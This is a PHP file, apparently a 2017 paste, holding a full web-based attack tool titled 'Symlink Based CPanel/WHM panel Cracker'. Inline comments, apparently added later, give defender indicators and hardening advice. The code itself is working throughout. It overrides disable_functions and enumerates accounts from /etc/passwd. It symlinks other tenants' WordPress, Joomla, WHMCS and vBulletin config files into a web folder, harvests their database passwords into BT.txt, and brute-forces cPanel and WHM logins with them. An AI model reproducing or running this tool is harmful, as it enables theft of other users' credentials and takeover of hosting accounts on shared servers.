HKFl

whm.php

Sep 15th, 2017
  1. <?php
  2.  
  3. $head = '
  4. <html>
  5. <head>
  6. </script>
  7. <title>Symlink Based CPanel/WHM panel Cracker</title>
  8.  
  9. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  10.  
  11. <STYLE>
  12. body {
  13. font-family: Tahoma
  14. }
  15. tr {
  16. BORDER: dashed 1px #333;
  17. color: #FFF;
  18. }
  19. td {
  20. BORDER: dashed 1px #333;
  21. color: #FFF;
  22. }
  23. .table1 {
  24. BORDER: 0px Black;
  25. BACKGROUND-COLOR: Black;
  26. color: #FFF;
  27. }
  28. .td1 {
  29. BORDER: 0px;
  30. BORDER-COLOR: #333333;
  31. font: 7pt Verdana;
  32. color: Green;
  33. }
  34. .tr1 {
  35. BORDER: 0px;
  36. BORDER-COLOR: #333333;
  37. color: #FFF;
  38. }
  39. table {
  40. BORDER: dashed 1px #333;
  41. BORDER-COLOR: #333333;
  42. BACKGROUND-COLOR: Black;
  43. color: #FFF;
  44. }
  45. input {
  46. border : solid 3px ;
  47. border-color : #333;
  48. BACKGROUND-COLOR: white;
  49. font: 11pt Verdana;
  50. color: #333;
  51. }
  52. select {
  53. BORDER-RIGHT: Black 1px solid;
  54. BORDER-TOP: #DF0000 1px solid;
  55. BORDER-LEFT: #DF0000 1px solid;
  56. BORDER-BOTTOM: Black 1px solid;
  57. BORDER-color: #FFF;
  58. BACKGROUND-COLOR: Black;
  59. font: 8pt Verdana;
  60. color: Red;
  61. }
  62. submit {
  63. BORDER: buttonhighlight 2px outset;
  64. BACKGROUND-COLOR: Black;
  65. width: 30%;
  66. color: #FFF;
  67. }
  68. textarea {
  69. border : dashed 1px #333;
  70. BACKGROUND-COLOR: Black;
  71. font: Fixedsys bold;
  72. color: #999;
  73. }
  74. BODY {
  75. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  76. margin: 1px;
  77. color: Red;
  78. background-color: Black;
  79. }
  80. .main {
  81. margin : -287px 0px 0px -490px;
  82. BORDER: dashed 1px #333;
  83. BORDER-COLOR: #333333;
  84. }
  85. .tt {
  86. background-color: Black;
  87. }
  88.  
  89. A:link {
  90. COLOR: White; TEXT-DECORATION: none
  91. }
  92. A:visited {
  93. COLOR: White; TEXT-DECORATION: none
  94. }
  95. A:hover {
  96. color: Red; TEXT-DECORATION: none
  97. }
  98. A:active {
  99. color: Red; TEXT-DECORATION: none
  100. }
  101. </STYLE>
  102. <script language=\'javascript\'>
  103. function hide_div(id)
  104. {
  105. document.getElementById(id).style.display = \'none\';
  106. document.cookie=id+\'=0;\';
  107. }
  108. function show_div(id)
  109. {
  110. document.getElementById(id).style.display = \'block\';
  111. document.cookie=id+\'=1;\';
  112. }
  113. function change_divst(id)
  114. {
  115. if (document.getElementById(id).style.display == \'none\')
  116. show_div(id);
  117. else
  118. hide_div(id);
  119. }
  120. </script>'; ?>
  121. <html>
  122. <head>
  123.  
  124. <link rel="SHORTCUT ICON" type="image/x-icon" href="http://s13.postimg.org/d82nq5frb/UBHFinal1.png"><center>
  125. <a href="#"> <img src="http://aj3dx.altervista.org/anonymous-psn-hacker.jpg" border="0"></center></a>
  126.  
  127. <h2><center>Symlink Based CPanel/WHM panel Cracker</center></h2>
  128. <?php
  129. echo $head ;
  130. echo '
  131.  
  132. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  133.  
  134. </td></tr><tr><td
  135. width="100%" align="center" valign="top" rowspan="1"><font
  136. color="red" face="arial"size="1"><b>
  137.  
  138. ';
  139.  
  140. ?>
  141. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="arial">
  142. <form method=post>
  143. <input type=submit name=ini value="Generate PHP.ini" /></form>
  144. <?php
       // When the "ini" button is posted, writes a file named php.ini into the script's
       // working directory whose only setting is disable_functions=none, then prints a link to it.
       // NOTE(review): presumably meant to override the server-wide disable_functions list;
       // whether a per-directory php.ini is honoured depends on the PHP handler configuration —
       // confirm for the host under investigation.
       // Defender indicator: an unexpected php.ini inside a web-served directory that contains
       // "disable_functions=none". Hardening: do not let account-level ini files override
       // security-relevant directives.
  145. if(isset($_POST['ini']))
  146. {
  147.  
  148. $r=fopen('php.ini','w');
  149. $rr=" disable_functions=none ";
  150. fwrite($r,$rr);
  151. $link="<a href=php.ini><font color=white size=2 face=\"arial\"><u>link to php.ini file</u></font></a>";
  152. echo $link;
  153.  
  154. }
  155. ?>
  156. <?php
  157.  
  158. ?>
  159. <form method=post>
  160. <input type=submit name="usre" value="Extract Usernames" /></form>
  161.  
  162.  
  163.  
  164.  
  165. <?php
       // When the "usre" button is posted, renders a form whose textarea is filled with the first
       // colon-separated field of every /etc/passwd line (the local account names); the textarea
       // is posted back as "user" together with the "su" button.
       // Defender note: this enumeration only works because the PHP process can read /etc/passwd.
       // Per-account filesystem confinement (open_basedir or a jailed filesystem view) removes
       // this source of account names on shared hosting.
  166. if(isset($_POST['usre'])){
  167. ?><form method=post>
  168. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
  169. foreach($users as $user)
  170. {
  171. $str=explode(":",$user);
  172. echo $str[0]."\n";
  173. }
  174.  
  175. ?></textarea><br><br>
  176. <input type=submit name=su value="Start" /></form>
  177. <?php } ?>
  178. <?php
       // When the "su" button is posted: creates a directory BT (mode 0777), drops a .htaccess
       // into it, and for every posted account name creates symlinks inside BT/ that point at
       // well-known CMS configuration paths under /home/<account>/public_html.
       // Defender indicators (all visible below): a web-served directory named BT containing a
       // .htaccess with "Options all" / "Satisfy Any", and many symlinks named "<account>..<tag>"
       // whose targets are configuration files owned by other accounts.
       // Hardening: enforce owner-match symlink handling in the web server and do not allow
       // .htaccess to change Options; keep CMS configuration files readable by their owner only;
       // consider disabling symlink() for PHP on shared hosts.
       // error_reporting(0) silences PHP error reporting for the rest of the request.
  179. error_reporting(0);
  180. echo "<font color=red size=2 face=\"arial\">";
  181. if(isset($_POST['su']))
  182. {
  183.  
  184. $dir=mkdir('BT',0777);
       // .htaccess content: "Options all" turns on every Options feature for BT/ (which includes
       // following symlinks), and "Require None" / "Satisfy Any" relax access control.
       // NOTE(review): whether these directives take effect depends on the server's
       // AllowOverride settings — confirm against the vhost configuration.
  185. $r = " Options all \n DirectoryIndex BT.html \n Require None \n Satisfy Any";
  186. $f = fopen('BT/.htaccess','w');
  187.  
  188. fwrite($f,$r);
  189. $consym="<a href=BT/><font color=white size=3 face=\"arial\">Configuration files</font></a>";
  190. echo "<br>Folder Where Config Files has been Symlinked<br><u><font color=red size=2 face=\"arial\">$consym</font></u>";
  191.  
       // One account name per line, taken straight from the posted "user" field.
  192. $usr=explode("\n",$_POST['user']);
  193.  
  194. foreach($usr as $uss )
  195. {
  196. $us=trim($uss);
  197.  
       // Each symlink() below is attempted unconditionally and its return value is ignored;
       // link names carry no .php extension.
  198. $r="BT/";
  199. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  200. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  201. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  202. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  203. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  204. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  205. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  206. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  207. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  208. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  209. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  210. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  211. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  212. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  213. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  214. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  215. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  216. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  217. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  218. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  219. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  220. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  221. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  222. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  223. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  224. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  225. }
  226. }
  227. ?>
  228. <?php
  229.  
  230. ?>
  231.  
  232. <form method=post>
  233. <input type=submit name=sm value="Grab Passwords from Configuration files"></form>
  234. <?php
       // Error reporting is switched off and the execution time limit removed for this request.
  235. error_reporting(0);
  236. set_time_limit(0);
       /**
        * Returns the trimmed text found between two literal markers.
        *
        * The input is split on the start marker, the piece after its first occurrence is split
        * on the end marker, and the first resulting piece is trimmed and returned.
        * Neither marker is checked for presence before the array elements are read.
        *
        * @param string $text               Text to search.
        * @param string $marqueurDebutLien  Literal start marker.
        * @param string $marqueurFinLien    Literal end marker.
        * @return string Trimmed text between the markers.
        */
  237. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  238. {
  239.  
  240. $ar0=explode($marqueurDebutLien, $text);
  241. $ar1=explode($marqueurFinLien, $ar0[1]);
  242. $ar=trim($ar1[0]);
  243. return $ar;
  244. }
  245.  
  246. if(isset($_POST['sm']))
  247.  
  248. {
       // When the "sm" button is posted: for every account name in /etc/passwd and every suffix
       // in $confi, requests http://<SERVER_NAME><script dir>/BT/<account><suffix> from this same
       // server, classifies the response by keyword, pulls out the text between fixed
       // password markers with entre2v2(), echoes it and appends it to BT.txt.
       // NOTE(review): the files are fetched over HTTP rather than read from disk, presumably so
       // the web server returns the linked PHP source as static text — confirm against how the
       // server maps the extension-less link names.
       // Defender indicators (all visible below): self-originated HTTP requests for paths under
       // /BT/ ending in the $confi suffixes, sent with the fixed Firefox/3.0.8 User-Agent string,
       // and a file BT.txt next to the script holding one recovered secret per line.
       // Response: treat every database password reachable this way as compromised and rotate it;
       // BT.txt lists what was actually captured.
  249.  
  250. echo '<font color=green>OK++';
  251.  
       // Opened in append mode in the script's working directory; never closed in this block.
  252. $ffile=fopen('BT.txt','a+');
  253.  
  254.  
  255. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/BT/";
  256. $re=$r;
  257. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  258.  
  259. $users=file("/etc/passwd");
  260. foreach($users as $user)
  261. {
  262.  
  263. $str=explode(":",$user);
  264. $usersss=$str[0];
  265. foreach($confi as $co)
  266. {
  267.  
  268.  
  269. $uurl=$re.$usersss.$co;
  270. $uel=$uurl;
  271.  
       // One request per account/suffix pair: response headers are included in the returned
       // text (CURLOPT_HEADER), connect timeout is 5 seconds, User-Agent is hard-coded.
  272. $ch = curl_init();
  273.  
  274. curl_setopt($ch, CURLOPT_URL, $uel);
  275. curl_setopt($ch, CURLOPT_HEADER, 1);
  276. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  277. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  278. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  279. $result['EXE'] = curl_exec($ch);
  280. curl_close($ch);
  281. $uxl=$result['EXE'];
  282.  
  283.  
       // The branches below classify the response by a case-insensitive keyword and then
       // extract the value between a fixed pair of markers.
  284. if($uxl && preg_match('/table_prefix/i',$uxl))
  285. {
  286.  
  287. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Wordpress </font></td></tr></table>";
  288.  
  289. echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  290. if(!empty($dbp))
  291. $pass=$dbp."\n";
       // Forensic note: this fwrite is not governed by the if above (no braces), so whatever
       // $pass currently holds is written; expect repeated lines in BT.txt. The same shape
       // recurs in every branch below.
  292. fwrite($ffile,$pass);
  293.  
  294. }
  295. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  296. {
  297.  
  298. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Whmcs </font></td></tr></table>";
  299.  
  300. echo $dbp=entre2v2($uxl,"db_password = '","';");
  301. if(!empty($dbp))
  302. $pass=$dbp."\n";
  303. fwrite($ffile,$pass);
  304.  
  305. }
  306.  
  307.  
  308. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  309. {
  310.  
  311. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Joomla </font></td></tr></table>";
  312.  
  313. echo $db=entre2v2($uxl,"password = '","';");
  314. if(!empty($db))
  315. $pass=$db."\n";
  316. fwrite($ffile,$pass);
  317. }
  318. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  319. {
  320.  
  321. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is vbulletin </font></td></tr></table>";
  322.  
  323. echo $db=entre2v2($uxl,"password'] = '","';");
  324. if(!empty($db))
  325. $pass=$db."\n";
  326. fwrite($ffile,$pass);
  327.  
  328. }
  329. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  330. {
  331.  
  332. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  333.  
  334. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  335. if(!empty($db))
  336. $pass=$db."\n";
  337. fwrite($ffile,$pass);
  338. }
  339. elseif($uxl && preg_match('/dbpass/i',$uxl))
  340. {
  341.  
  342. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  343.  
  344. echo $db=entre2v2($uxl,"dbpass = '","';");
  345. if(!empty($db))
  346. $pass=$db."\n";
  347. fwrite($ffile,$pass);
  348. }
  349. elseif($uxl && preg_match('/dbpass/i',$uxl))
  350. {
  351.  
  352. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  353.  
  354. echo $db=entre2v2($uxl,"dbpass = '","';");
  355. if(!empty($db))
  356. $pass=$db."\n";
  357. fwrite($ffile,$pass);
  358.  
  359. }
  360. elseif($uxl && preg_match('/dbpass/i',$uxl))
  361. {
  362.  
  363. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  364.  
  365. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  366. if(!empty($db))
  367. $pass=$db."\n";
  368. fwrite($ffile,$pass);
  369. }
  370.  
  371.  
  372. }
  373. }
  374. }
  375. ?>
  376. <?php
  377.  
  378. ?>
  379.  
  380.  
  381. <form method=post>
  382. <input type=submit name=cpanel value="Auto CPanel/WHM panel cracker"><p>
  383. <?php
       // When the "cpanel" button is posted, renders the credential-guessing form: a selector
       // "op" (cp or whm), a "usernames" textarea filled with the account names from
       // /etc/passwd, and a "passwords" textarea filled from BT.txt in the current directory.
       // Defender note: the password candidates are the secrets previously written to BT.txt,
       // i.e. database passwords are being tried as control-panel passwords. Accounts that
       // reuse one password for both remain exposed until both are rotated.
  384.  
  385. if(isset($_POST['cpanel']))
  386. {
  387. ?>
  388. <form method=post><div align=center><table>
  389. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
  390. <option name="op" value="whm">WHMPanel</option></table><p>
  391. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  392. foreach($users as $user)
  393. {
  394. $str=explode(":",$user);
  395. echo $str[0]."\n";
  396. }
  397.  
  398. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
  399. <?php
       // Reads BT.txt line by line and prints each line trimmed into the "passwords" textarea.
  400.  
  401. $d=getcwd()."/BT.txt";
  402. $pf=file($d);
  403. foreach($pf as $rt)
  404. {
  405. $str=explode('\n',$rt);
  406. echo trim($str[0])."\n";
  407. } ?></textarea><p>
  408. <input type=submit name=cpanelcracking value="Start"></form>
  409. <?php
  410. }
  411. ?>
  412.  
  413.  
  414.  
  415.  
  416. <?php
       // Settings for the credential-guessing step: error reporting off, no execution time
       // limit, 5-second connect timeout. The username list, password list and mode are read
       // from the POST body without an isset() check, and the target host is fixed to
       // "localhost", so every login attempt is made against the machine the script runs on.
       // Defender note: the resulting authentication failures originate from the server itself;
       // NOTE(review): verify that the panel's brute-force protection and alerting do not
       // exempt loopback/local source addresses.
  417. error_reporting(0);
  418. $connect_timeout=5;
  419. set_time_limit(0);
  420.  
  421. $userl=$_POST['usernames'];
  422. $passl=$_POST['passwords'];
  423. $attack=$_POST['op'];
  424. $target = "localhost";
  425.  
  426. if(isset($_POST['cpanelcracking']))
  427. {
  428. if($userl!=="" && $passl!=="")
  429. {
  430. if($_POST["op"]=="cp")
  431. {
  432. $cracked=$_POST['crack'];
  433. @fopen($cracked,'a');
  434. echo "Attacking CPanel....please wait till the end of process \n";
  435.  
  436.  
  437. }
  438. elseif($_POST["op"]=="whm")
  439. {
  440. @fopen($cracked,'a');
  441. echo "Attacking WHM panel....please wait till the end of process";
  442.  
  443. }
  444.  
  445. function cpanel($host,$user,$pass,$timeout){
       // Sends one HTTP Basic-auth request with $user:$pass to http://$host:2082 and, when curl
       // reports no error, prints the pair into the page as "Cracked". CURLOPT_FAILONERROR makes
       // HTTP status codes >= 400 count as a curl error, so a rejected login prints nothing.
       // The response body in $data is not inspected. Returns nothing.
       // Defender indicators: a run of failed Basic-auth requests to port 2082 over plain HTTP,
       // one per username/password combination, coming from the local host. Rate-limiting and
       // lockout on the panel login, plus multi-factor authentication, blunt this step.
  446. $ch = curl_init();
  447. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  448. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  449. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  450. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  451. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  452. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  453. $data = curl_exec($ch);
  454. if ( curl_errno($ch) == 0 ){
  455. echo "<table width=100% ><tr><td align=center><b></font>
  456.  
  457. <font color=red size=2> Cracked </font>
  458.  
  459. <font color=white size=2> Username is </font>
  460.  
  461. <font color=green size=2> $user</font>
  462.  
  463. <font color=red size=2> & </font>
  464.  
  465. <font color=white size=2> Password is </font>
  466.  
  467. <font color=green size=2> $pass </font>
  468.  
  469. </font></b></td></tr></table>";
  470.  
  471. }
  472.  
  473. curl_close($ch);}
  474.  
  475. $userlist=explode("\n",$userl);
  476. $passlist=explode("\n",$passl);
  477.  
  478. if ($attack == "cp")
  479. {
  480. foreach ($userlist as $user) {
  481. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  482. $finaluser = trim($user);
  483. foreach ($passlist as $password ) {
  484. $finalpass = trim($password);
  485.  
  486.  
  487. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  488.  
  489. }
  490. }
  491.  
  492. }
  493.  
  494. function whm($host,$user,$pass,$timeout){
       // Sends one HTTP Basic-auth request with $user:$pass to http://$host:2086 and, when curl
       // reports no error, prints the pair into the page as "Cracked". CURLOPT_FAILONERROR makes
       // HTTP status codes >= 400 count as a curl error, so a rejected login prints nothing.
       // The response body in $data is not inspected. Returns nothing.
       // Defender indicators: a run of failed Basic-auth requests to port 2086 over plain HTTP,
       // one per username/password combination, coming from the local host. Rate-limiting and
       // lockout on the panel login, plus multi-factor authentication, blunt this step.
  495. $ch = curl_init();
  496. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  497. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  498. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  499. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  500. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  501. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  502. $data = curl_exec($ch);
  503. if ( curl_errno($ch) == 0 ){
  504. echo "<table width=100% ><tr><td align=center><b></font>
  505.  
  506. <font color=red size=2> Cracked </font>
  507.  
  508. <font color=white size=2> Username is </font>
  509.  
  510. <font color=green size=2> $user</font>
  511.  
  512. <font color=red size=2> & </font>
  513.  
  514. <font color=white size=2> Password is </font>
  515.  
  516. <font color=green size=2> $pass </font>
  517.  
  518. </font></b></td></tr></table>";
  519.  
  520.  
  521.  
  522.  
  523. }
  524.  
  525.  
  526. curl_close($ch);}
  527. $userlist=explode("\n",$userl);
  528. $passlist=explode("\n",$passl);
  529.  
  530. if ($attack == "whm")
  531. {
  532. foreach ($userlist as $user) {
  533. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>user under attack is $user </font></td></tr></table>";
  534. $finaluser = trim($user);
  535. foreach ($passlist as $password ) {
  536. $finalpass = trim($password);
  537.  
  538. whm($target,$finaluser,$finalpass,$connect_timeout);
  539. }
  540. }
  541. }
  542. }
  543. elseif($userl=="")
  544. {
  545. echo "you have left userlist field empty";
  546.  
  547. }
  548. elseif($passl=="")
  549. {
  550.  
  551. echo "please put passwords in paasword list field";
  552. }
  553. }
  554. ?>